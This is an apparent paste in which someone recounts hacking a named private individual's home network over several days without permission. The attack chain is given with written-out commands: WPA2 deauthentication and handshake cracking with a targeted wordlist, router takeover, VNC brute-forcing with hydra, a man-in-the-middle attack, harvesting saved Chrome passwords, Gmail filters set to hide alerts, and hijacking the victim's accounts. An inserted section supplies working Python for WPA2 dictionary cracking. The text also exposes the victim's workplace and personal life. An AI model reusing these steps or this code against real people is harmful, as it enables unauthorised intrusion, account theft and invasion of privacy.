Untitled
a guest
Oct 14th, 2016

This is a detailed telling of how I hacked Philip M. over a period of several days. It started out as a typical router crack but I found myself motivated to dig deeper than usual. Without damaging the validity of the hack, I scrubbed as much identifiable info from the screenshots as possible to protect my identity.

Tools Used:
aircrack suite
cupp.py
pyrit
nmap
hydra
sparta
mitmf
sslstrip
arpspoof
ncrack
medusa
chromepass
FreeOTP
axcrypt
Patience


INFILTRATION:

$ airodump-ng -M wlan0mon

BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID     MANUFACTURER
C4:6E:1F:XX:XX:XX  -57      580     26    0  11  54e.  WPA2  CCMP    PSK   XXXXX     TP-LINK TECHNOLOGIES
F8:E4:FB:XX:XX:XX  -60      808    286    0   6  54e.  WPA2  CCMP    PSK   XXXXX     Actiontec Electronics, Inc
84:1B:5E:XX:XX:XX  -64     2547  27432    0  11  54e   WPA2  CCMP    PSK   BruceLee  Netgear
D4:05:98:XX:XX:XX  -70      304     32    0   1  54e.  WPA2  CCMP    PSK   XXXXX     ARRIS Group, Inc.
00:14:6A:XX:XX:XX  -71      401      3    0   3  54e.  WPA2  CCMP    PSK   XXXXX     CISCO SYSTEMS, INC.
00:26:62:XX:XX:XX  -71      382   2653    1  11  54e.  WPA2  CCMP    PSK   XXXXX     Actiontec Electronics, Inc
00:7F:28:XX:XX:XX  -73       56      5    0  11  54e.  WPA2  CCMP    PSK   XXXXX     Actiontec Electronics, Inc


There was enormous traffic coming from AP "BruceLee". Access points with this much activity are always exciting.

$ airodump-ng -c 11 -UM -w data/dump --bssid 84:1B:5E:XX:XX:XX wlan0mon

$ aireplay-ng -0 2 -a 84:1B:5E:XX:XX:XX -c 30:F7:C5:XX:XX:XX -e BruceLee wlan0mon


Now I needed to verify the integrity of the handshake and strip it of the useless data captured during the airodump run.

$ pyrit -r data/dump-117.cap analyze

$ pyrit -r data/dump-117.cap -o Desktop/BruceLee.cap strip

Parsing file 'data/dump-117.cap' (1/1)...
Parsed 4 packets (4 802.11-packets), got 1 AP(s)

#1: AccessPoint 84:1b:5e:xx:xx:xx ('BruceLee'):
#1: Station 30:f7:c5:xx:xx:xx, 1 handshake(s):
#1: HMAC_SHA1_AES, good, spread 1


With a solid capture, I was ready to bruteforce the cap. Netgear owners usually use custom passwords. I've never owned a Netgear router but imagine the firmware prompts users to enter a new password during the initial installation. This is especially wonderful to a cracker like myself because (as we all know) people have been using weak passwords since the inception of the password.

For this particular router, I created a custom wordlist before trying the larger libraries at my disposal. The reason I chose to generate a new wordlist is simply that his AP was named "BruceLee". This, to me, is a dead giveaway and an indicator that the password is potentially somehow related to Bruce Lee...

As source material for the wordlist, I navigated to Bruce Lee's Wikipedia and IMDb pages and scraped them for words of interest, such as: the cities and countries where Bruce Lee was born and lived, his movie character names, movie titles, the months, days, years and names on the wiki, etc. I also added a few commonly used generic weak passwords. For this I used CUPP.

$ python cupp.py -i

$ pyrit -r Desktop/BruceLee.cap -i cupp-master/bruce.txt attack_passthrough

Image

Parsing file 'Desktop/BruceLee.cap' (1/1)...
Parsed 4 packets (4 802.11-packets), got 1 AP(s)

Picked AccessPoint 84:1b:5e:xx:xx:xx ('BruceLee') automatically.
Tried 47254 PMKs so far; 906 PMKs per second.

The password is 'kato194027'.


Kato is Bruce Lee's character name in the 1960s TV series The Green Hornet. 1940 is the year Bruce was born. Not sure what 27 is. CUPP totally nailed it.

The truth is, I was prepared to spend a lot more time trying to crack this. A 61544-word list isn't exactly a comprehensive wordlist. This is where I decided to document my actions. With a password so easily guessed, I was counting on the rest of his setup being just as vulnerable, and I had just forged the master key to his city.


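As an added illustration (not code from the original post, and not CUPP's or pyrit's own code): the arithmetic behind "906 PMKs per second" and the check pyrit performs for every candidate, written out in Python. The handshake below is constructed: the SSID and the recovered passphrase come from the text above, but the MAC addresses, nonces and EAPOL frame are made-up fill-ins, not values from any capture, and the wordlist generator is a deliberately small CUPP-style stand-in.

```python
"""Added example, not code from the original post: a minimal WPA2-PSK dictionary
check that shows what pyrit/aircrack do per candidate and why a short, targeted
wordlist (name + birth year + two digits) finds a passphrase like the one above
in seconds. All handshake material below is constructed; the MACs, nonces and
EAPOL frame are made up and do not come from any real capture."""
import hashlib
import hmac
import struct
import time

# --- constructed handshake parameters (assumed values, not from a capture) ---
SSID = b"BruceLee"
AP_MAC = bytes.fromhex("841b5e000001")   # made-up fill for the masked BSSID
STA_MAC = bytes.fromhex("30f7c5000002")  # made-up fill for the masked station
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of key descriptor before the MIC


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This one call is the per-candidate cost that bounds cracking speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-384: 48-byte PTK; the first 16 bytes (KCK) key the EAPOL MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 * 20 bytes >= 48
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (HMAC-SHA1 / AES-CCMP): MIC = HMAC-SHA1(KCK, frame)[:16],
    computed over the whole EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Message 2 of the 4-way handshake (station -> AP), the frame crackers verify against."""
    body = (b"\x02"                            # descriptor type: RSN
            + struct.pack(">H", 0x010A)        # key info: version 2, pairwise, MIC present
            + struct.pack(">H", 0)             # key length
            + struct.pack(">Q", 1)             # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, ID (unused in message 2)
            + mic
            + struct.pack(">H", 0))            # key data length
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # 802.1X v1, type EAPOL-Key


def make_capture(passphrase: str) -> bytes:
    """Produce the 'captured' message 2 a real handshake would carry for this passphrase."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return build_msg2(SNONCE, eapol_mic(ptk[:16], build_msg2(SNONCE)))


def check_candidate(passphrase: str, frame: bytes) -> bool:
    """One dictionary step: passphrase -> PMK -> PTK -> MIC, compared with the captured MIC."""
    if not 8 <= len(passphrase) <= 63:      # outside the WPA passphrase range; crackers skip these
        return False
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.compare_digest(eapol_mic(ptk[:16], zeroed), frame[MIC_OFFSET:MIC_OFFSET + 16])


def targeted_wordlist(keywords, years):
    """CUPP-style candidates: word, word+year, word+year+two digits, in a fixed order."""
    for kw in keywords:
        for w in dict.fromkeys([kw, kw.lower(), kw.capitalize()]):   # ordered dedupe
            yield w
            for y in years:
                yield f"{w}{y}"
                for n in range(100):
                    yield f"{w}{y}{n:02d}"


def crack(frame: bytes, candidates):
    """Return (passphrase, attempts) on a MIC match, or (None, attempts) if the list runs out."""
    tried = 0
    for cand in candidates:
        tried += 1
        if check_candidate(cand, frame):
            return cand, tried
    return None, tried


def pmk_rate(samples: int = 200) -> float:
    """Single-core PBKDF2 throughput, the figure pyrit prints as 'PMKs per second'."""
    t0 = time.perf_counter()
    for i in range(samples):
        pmk_from_passphrase(f"candidate{i:04d}", SSID)
    return samples / (time.perf_counter() - t0)


if __name__ == "__main__":
    capture = make_capture("kato194027")          # constructed stand-in for BruceLee.cap
    found, attempts = crack(capture, targeted_wordlist(["kato", "greenhornet"], [1940, 1973]))
    print(f"found {found!r} after {attempts} candidates at ~{pmk_rate():.0f} PMKs/s")
```

Each candidate costs one PBKDF2 of 4096 HMAC-SHA1 rounds, which is why throughput is quoted in PMKs per second and why a 61,544-word targeted list finishes in roughly a minute at the 906 PMKs/s shown above; the PTK derivation and MIC comparison are nearly free by comparison. The practical check is the one the generator makes obvious: a passphrase built from a public name plus a birth year and two digits sits inside a list of a few hundred candidates, so only a passphrase no such generator reaches is out of reach of this attack.
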
RECONNAISSANCE:

This is by far the most exciting moment after cracking a router. The very first thing I do is find the gateway and change the password. This ensures ownership of the router and makes it difficult for the victim to change their AP password (should I be suspected on the network).

$ route -n

Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.1.1     0.0.0.0         UG    600    0        0 wlan0
192.168.1.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0


Typical gateway address. Login credentials are admin:admin or admin:password 95% of the time. In this case, Philip had changed the default gateway password... unfortunately for him, it was also "kato194027".

Here I thoroughly examined the Attached Devices. We can see there are several, including a Windows machine, an iPhone (CHUCKLES) and an iPad.

Image

Now for deeper recon, I used Sparta. It has quickly become my go-to recon tool. It's slow to scan (patience), but comprehensive and worth the wait in this situation.

What is SPARTA?

"SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analyzing results."

...Basically the GUI lovechild of nmap and hydra.

Image

We can see he's using Plex, VNC and SSH. The first thing I did was check whether his SSH server had password authentication enabled. To my surprise, it did not.

Moving on, his Plex library was the least interesting thing here. I observed a new email address, which I recorded but didn't take time to probe with known passwords.

Image

Poking at the VNC port, it was also password protected. Unlike SSH, this one I could bruteforce. For this I tried several tools: ncrack, medusa and hydra. The VNC server was extremely temperamental. After only a few consecutive attempts, the server timed out and ignored additional attempts to authenticate. Timeouts seemed to last about 15 seconds. This wouldn't have been a big deal, except that ncrack and hydra continued with new attempts even after the server timed out. This meant a potentially correct password could be lost on the timed-out server.

"[ERROR] VNC server connection failed"

There was a lot of that.

My experience with bruting VNC servers was limited, so this was a learning process. Fortunately hydra has a delay option that allowed me to place some time between authentication attempts. With some time spent finding the server's sweet spot, I settled on "-W 2". This would try a new password every 2 seconds. Which sucked. -- I calculated just over 40,000 password attempts over a 24-hour period, so I very carefully selected a wordlist and set up an old netbook I use for overnight and/or remote attacks such as this.

$ hydra -P wordlists/best110-wordlist.cupp.txt vnc://192.168.1.2:5900 -t 1 -W 2


While my netbook did its thing, I took the opportunity to start prepping a mitm attack back on my Kali box.

After several attempts, it worked. You'll notice the "type" of browser he used was "Mobile Safari". I was a little surprised by this. Maybe the built-in Mail app stopped responding after the mitm attacks? Your guess is as good as any here. Either way, it worked.

Image

Next, I was careful not to log in to his email over Tor. After all, Iceweasel's browser fingerprint was very likely dramatically different from his browsers of choice. A brand new fingerprint with a brand new IP belonging to another country might arouse Gmail's security features.

Image

This is a major breach. His email revealed an enormous amount of personal information about his life. Thanks to Google, I can now see Philip's web browsing habits from the last 365 days, his calendar/schedule, family photos and contacts, purchases and (partial) credit card information, his place of work, his girlfriend's address and their movements throughout the city. With enough analysis someone could probably determine their favorite places to eat and how often they fuck.

Though it is glorious, I'm withholding the screenshot of his daily Google Maps activity as it reveals my location to within 100 miles.

I returned to my netbook a day later (patience) and discovered, remarkably, that the VNC password had cracked.

1 of 1 target successfully completed, 1 valid password found
password: "monkey1234"

Image

Unfortunately for Philip, this is checkmate; his entire network, desktop and primary email address are completely compromised at this point. The above screenshot is his desktop via VNC. I might as well be sitting in his apartment at this point. His monitor was much larger than my Kali VM allowed, so my money shot is a little botched.

Now, his browser revealed several entries stored in the built-in password manager. They were protected by his Windows login password, which I didn't know, so I couldn't view them here. But this wasn't a concern; I came prepared. Enter: ChromePass.

"ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time."

Image

This I thought was really funny. Windows "User Account Control" kept closing my VNC connection when ChromePass.exe was opened, so I wrote a (laughably) stupid batch script to execute the exe. Windows security is truly ridiculous.


EXECUTION:

With his passwords in hand, it was time to wreak havoc.

I didn't want to alert Philip to the compromise yet, so I didn't immediately log in (patience) to the VNC. From the looks of it, he's some kind of sales or operations manager at JCrew, handling special orders and such. He was piping his work emails into this Gmail account, so it seemed probable he would be working out of email during the breach. After all, compromising his primary email account wasn't my only goal.

To avoid detection I created custom Gmail filters to automatically trash new emails from *.facebook.com, *.google.com and *.chase.com. This way his phone wouldn't start buzzing uncontrollably when changes occurred. Thanks again, Google.

Image

Damage Report:

- changed Gmail password, changed backup email address associated with Gmail, added 2FA with FreeOTP
- changed Dropbox password, changed email associated with the account, added 2FA
- changed iCloud password
- changed Twitter account password and email address
- encrypted his PC customer info and PC photo library
- changed Facebook password

I thought this was a good place to stop. Truth be told, this venture lost its flavor once his VNC cracked; the challenge was over.

CONCLUSION:

Ultimately, I returned ownership of Philip's accounts after several hours. I cleared his desktop of shortcuts and created a Dear\ Philip.txt:

Image